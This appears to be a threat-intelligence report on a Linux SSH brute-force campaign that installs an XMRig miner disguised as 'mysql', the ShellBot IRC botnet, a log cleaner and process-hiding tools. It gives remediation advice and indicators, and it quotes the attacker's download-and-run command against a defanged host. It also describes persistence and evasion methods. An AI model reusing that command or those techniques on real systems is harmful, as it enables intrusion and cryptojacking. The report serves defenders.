Threat reportMalwareTL-2026-1345

XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting Linux SSH Servers via SSH Brute-Force

highACTIVE

XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting (TL-2026-1345), also tracked as XMRig Mysql-Disguised CoinMiner / ShellBot SSH Campaign, is a high-severity malware campaign, first published 2026-07-14. It is attributed to XMRig operator with low confidence, affects N/A Poorly managed / internet-facing Linux servers (SSH service), maps to 20 MITRE ATT&CK techniques (T1021, T1027, T1036), and is covered by 9 detection rules and 32 indicators of compromise.

Severity
HIGHAssessed severity
CVEs
0None referenced
Techniques
20MITRE ATT&CK
Actors
1XMRig operator
Detection rules
9SPL · KQL · Sigma
IOCs
32Indicators of compromise

Key facts for TL-2026-1345

Threat ID
TL-2026-1345
Also known as
XMRig Mysql-Disguised CoinMiner / ShellBot SSH Campaign
Severity
HIGH
Status
ACTIVE
Category
MALWARE
First published
Last reviewed
Attribution
XMRig operator
Attribution confidence
LOW
Motivation
FINANCIAL
Target sectors
all sectors opportunistic unmanaged linux server exposure
Target regions
Global
Detection rules
9
Indicators of compromise
32

Malware and tooling in XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting

Malware and tooling: LiGhT's Modded perlbot v2, PerlBot, xmrig, MIG LogCleaner, XHide, meta (Go propagation scanner), run (Go downloader)

How XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting works

A long-running threat actor operation, active since at least 2023 and documented by AhnLab ASEC honeypot telemetry through July 2026, brute-forces poorly managed internet-facing Linux SSH servers to deploy an XMRig cryptocurrency miner disguised as the 'mysql' process alongside the ShellBot (PerlBot) IRC-based DDoS botnet, MIG LogCleaner, and XHide process-masking utilities.

Threat actors scan the internet for Linux hosts with port 22 (SSH) exposed and run dictionary/brute-force attacks against weak or default SSH credentials. Once valid credentials are obtained and a session established, the attacker issues initial reconnaissance commands and downloads a Go-based downloader ('run') via `wget download.Xrpl[.]City/run && chmod +x run && ./run`. The downloader modifies the compromised user's password (denying re-entry to competing actors and complicating remediation) and retrieves a packaged malware bundle ('pack.jpg') that is unpacked and executed.

The bundle deploys an XMRig-based Monero CoinMiner disguised as the 'mysql' binary, installed to `/etc/ufw/.Dev/oracle-monitor` and `/dev/shm/.Sys_cache_backup` with a systemd persistence unit at `/etc/systemd/system/oracle-service.Service` and cron-based reboot persistence. The miner process is renamed via XHide (h32/h64) argv[0] spoofing to masquerade as legitimate system processes such as irqbalance, systemd-logind, dbus-daemon, or kworker kernel threads, and a watchdog script periodically checks `/dev/shm/` for the miner's presence, re-downloading it if removed. A companion Go-written propagation tool ('meta') scans other hosts on port 22 using bundled credential and IP-range wordlists ('pass'/'ranges'), deploys XMRig to newly compromised systems, and reports campaign telemetry back to `hxxp://youpost[.]In/`.

Alongside the miner, the actor installs ShellBot (also tracked as PerlBot), a Perl-based IRC botnet supporting DDoS command execution, arbitrary system control, and log manipulation, connecting to IRC C2 infrastructure at `Irc[.]Lat:80` (channel #X, admin X) and `Irc.Undernet[.]Org:6667` (channel #T3st, admin Egeu). MIG LogCleaner is deployed alongside ShellBot to purge authentication and shell history logs, hindering forensic reconstruction. The actor further deploys compiled shell-command-compiler (shc) wrapper scripts that alias standard administrative binaries (w→myw, crontab→myc, top→pot, uptime→myu) to hide CPU load, cron entries, and system uptime from defenders, staged under `/usr/share/terminfo/c/.X/.L/` and `/usr/share/terminfo/c/.X/.X/`, with additional persistence via `.bashrc` alias/symlink hijacking.

XMRig connects to a pool of mining relay endpoints (`sad[.]Lat:80`, `192.3.9[.]34:80`, `172.245.81[.]188:80`, `146.19.213[.]82:80`, `23.94.137[.]96:80`) using the command line `-u smart --tls --donate-level=0 --null-hash-report --no-color`; an alternate bundle variant ('auto.jpg') instead mines directly to pool `time.Justnames[.]In:80` under a hardcoded Monero wallet address. ASEC's broader Q4 2025 Linux SSH malware telemetry situates this activity within a wider ecosystem dominated by the P2PInfect worm (80.4% of observed attacks) and Prometei (8.3%), with ShellBot/PerlBot distribution throughout 2025 attributed in ASEC reporting to the long-running Romanian threat group RUBYCARP, which has operated ShellBot-based cryptomining/DDoS campaigns against Linux SSH servers for over a decade; ASEC's July 2026 report does not itself name an actor, so this campaign is tracked as an unattributed but toolset-consistent continuation of that lineage pending stronger attribution evidence.

MITRE ATT&CK techniques used in TL-2026-1345

Lateral Movement

T1021 Remote Services

Defense Evasion

T1027 Obfuscated Files or Information; T1036 Masquerading; T1070 Indicator Removal; T1564 Hide Artifacts

Persistence

T1053 Scheduled Task/Job; T1543 Create or Modify System Process; T1546 Event Triggered Execution

Discovery

T1057 Process Discovery; T1082 System Information Discovery

Execution

T1059 Command and Scripting Interpreter

Command and Control

T1071 Application Layer Protocol; T1105 Ingress Tool Transfer

Initial Access

T1078 Valid Accounts

Credential Access

T1110 Brute Force

Impact

T1496 Resource Hijacking; T1498 Network Denial of Service

Resource Development

T1583 Acquire Infrastructure; T1588 Obtain Capabilities

Reconnaissance

T1595 Active Scanning

Affected products and versions in XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting

  • N/A — Poorly managed / internet-facing Linux servers (SSH service)
    Vulnerable versions: Any Linux distribution with SSH exposed and weak/default credentials
    Fixed in: N/A - credential hygiene and configuration issue, not a software vulnerability

Remediation for XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting

Immediate actions

  • Disable password-based SSH authentication and enforce key-based auth with strong passphrases
  • Rotate credentials on any Linux host that permitted SSH logins from unexpected source IPs, especially any account whose password may already be attacker-modified
  • Block outbound/inbound traffic to the documented C2 domains and IPs (download.xrpl.city, irc.lat, sad.lat, time.justnames.in, youpost.in, 143.20.185.252, 146.19.213.82, 172.245.81.188, 185.242.3.57, 192.3.9.34) at perimeter firewall/DNS resolver
  • Hunt for the documented file paths and lock files (/etc/ufw/.Dev/oracle-monitor, /dev/shm/.Sys_cache_backup, /dev/shm/.Agt.Lck, /dev/shm/.Mnr.Lck, /etc/systemd/system/oracle-service.Service, /usr/share/terminfo/c/.X/.L/, /usr/share/terminfo/c/.X/.X/) and quarantine/remove matches
  • Audit crontab entries and systemd unit files on internet-facing Linux hosts for unauthorized reboot-persistence entries
  • Inspect .bashrc and shell profile files for unauthorized alias/symlink hijacking of w, crontab, top, uptime, and ls

Workarounds

  • Where key-based SSH cannot yet be enforced, require MFA for SSH logins and enforce strong, unique passwords via a managed password policy

Longer-term hardening

  • Deploy fail2ban or equivalent SSH brute-force rate limiting and lockout on all internet-facing Linux servers
  • Move SSH off the default port 22 where operationally feasible and restrict SSH exposure via allowlisted source IPs / VPN / bastion hosts
  • Deploy EDR/host-based monitoring with behavioral detection for masqueraded process names, unexpected outbound IRC traffic, and cryptomining process signatures
  • Centralize and forward auth/syslog to an external log collector so MIG LogCleaner-style local log tampering cannot erase forensic evidence
  • Implement network egress filtering to block unsanctioned outbound connections to mining pools and IRC ports

Weaknesses (CWE) in XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting

CWE-1391, CWE-798, CWE-778

Timeline of XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting

  • ASEC assesses that the threat actor behind this XMRig/ShellBot toolset has been conducting SSH brute-force attacks against Linux servers since at least 2023.
  • ASEC first publicly documents ShellBot (Perl-based DDoS bot) being distributed to Linux SSH servers alongside Tsunami DDoS bot, log cleaners, and XMRig CoinMiner.
  • ASEC and other outlets report ShellBot operators shifting download URLs from plain IP addresses to hexadecimal notation to evade detection and blocklists.
  • Throughout 2025, ASEC observes RUBYCARP distributing two ShellBot variants against Linux SSH servers: an advanced 'LiGhT's Modded perlbot v2' supporting IRC flooding, DDoS, scanning, and reverse shells, and a simplified DDoS/port-scanning variant; both share the distinctive @auth infrastructure string 'netadmin.fuckoff.org'.
  • ASEC's Q4 2025 honeypot telemetry period during which P2PInfect, Prometei, and XMRig activity against Linux SSH servers is measured, with ShellBot/PerlBot distribution throughout 2025 tied in ASEC reporting to the long-running RUBYCARP threat group.
  • ASEC publishes its Q4 2025 Linux SSH server malware statistics report, showing P2PInfect (80.4%) dominating honeypot-observed attacks, followed by Prometei (8.3%) and XMRig (2.4%), with IoT-targeting malware (Mirai, Gafgyt, Tsunami) also observed alongside coin miners and DDoS bots.
  • AhnLab ASEC publishes a case study documenting the current campaign: an XMRig CoinMiner disguised as 'mysql', ShellBot IRC botnet, MIG LogCleaner, and XHide process-masking tools deployed via SSH brute force, with 5 C2 domains, 5 C2 IPs, and 5 file hashes.
  • Threadlinqs Intelligence Platform ingests the ASEC report via RSS hunt pipeline and opens threat record TL-2026-1345 for full research and detection engineering.

Sources cited for XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting

Detection coverage for TL-2026-1345

As of 2026-07-14, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-1345 across Splunk SPL, Microsoft KQL and Sigma, covering 32 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.

9 detection rules (Splunk SPL, Microsoft KQL, Sigma) · Blue and above. Compare plans
32 indicators of compromise · Red and above. Compare plans

Threadlinqs Intelligence — Real-Time Threat Detection Platform

[ 0 threats ] [ 0 det ] [ CRIT: 0 ] [ HIGH: 0 ]
// threat_feed
$ sort --newest
Showing all threats

Live intelligence console

Threat level
Fig. 01 · Threat weatherIndexing the archive…
1 square = 1 threat · click to open

Latest Threats